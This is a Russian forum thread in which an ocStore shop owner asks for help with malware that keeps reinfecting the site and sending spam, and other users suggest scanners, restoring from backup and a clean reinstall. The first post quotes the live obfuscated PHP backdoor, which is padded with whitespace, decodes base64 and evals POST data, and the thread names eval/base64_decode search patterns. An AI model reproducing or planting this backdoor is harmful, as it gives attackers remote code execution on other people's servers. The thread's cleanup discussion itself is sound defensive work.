Перейти к содержанию
hitball

Каждый день вредоносный код(((

Рекомендуемые сообщения

Здравствуйте, уважаемая поддержка!

Регулярно на сайте появляется вредоносный код, хостеру жалуются на рассылку спама с нашего сервера. Количество писем доходит до 20000, постепенно они превращаются в мертвые.

Код такого плана добавляется в файлы сайта, но многие файлы он создает сам!

<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na82bec'])) {eval($s21(${$s20}['na82bec']));}?>
<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n538c51'])) {eval($s21(${$s20}['n538c51']));}?><?php
// Heading
$_['heading_title'] = 'Приветствие';
?>

Файлы и код появляются хаотично по всему сайту. К примеру сегодня удалила из папок image, vqmod, system, catalog примерно 30 кусков этого кода.

 

 

Магазин ocStore Version 1.5.4.1

Очень много стоит модулей. 

Помогите понять в чем проблема, пока нас не попросили с хостинга(((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Первая и основная причина,здравствуй варез и с ним все вирусы...

Вторая менее вероятная,наличие по соседству  WP или Joomla.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? 

:-D то что стоит денег, а вы решили взять бесплатно на сомнительных сайтах и есть варез

https://ru.wikipedia.org/wiki/%D0%92%D0%B0%D1%80%D0%B5%D0%B7

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

не факт. Ваши файлы системные уже скорее всего заражены.

Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

pashast, сейчас проверяю virusdie это ведь по сути то же самое?

timedontwait, спасибо, сейчас сравню.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да поддерживаю aibolit используйте. Толковая утилита

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

не вышло у меня запустить айболит с сервера к сожалению( 

ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13?

может по этим словам поискать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили",  а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тогда как по мне ,выход у вас один.Собрать магазин  из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву).

Папку с картинками слейте и прогоните на компе  анти-вирусником.Останется только  вставить конфиги и проверенную  папку с картинками  и заменить нынешнего больного,на просветлённого нового))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Айболит не лечит, айболит -  экспресс диагностика.

 

Лечат другие средства...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

chukcha, с радостью выслушаю ваше предложение по лечению сайта

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

destreser, странный этот антивирус. Ругается на кучу здоровых файлов  :ugeek: 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Значит вручную перебирайте каждый файл.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w"

 сегодня пока ничего не лезет, очень надеюсь, что помогло!

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции?

 

Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.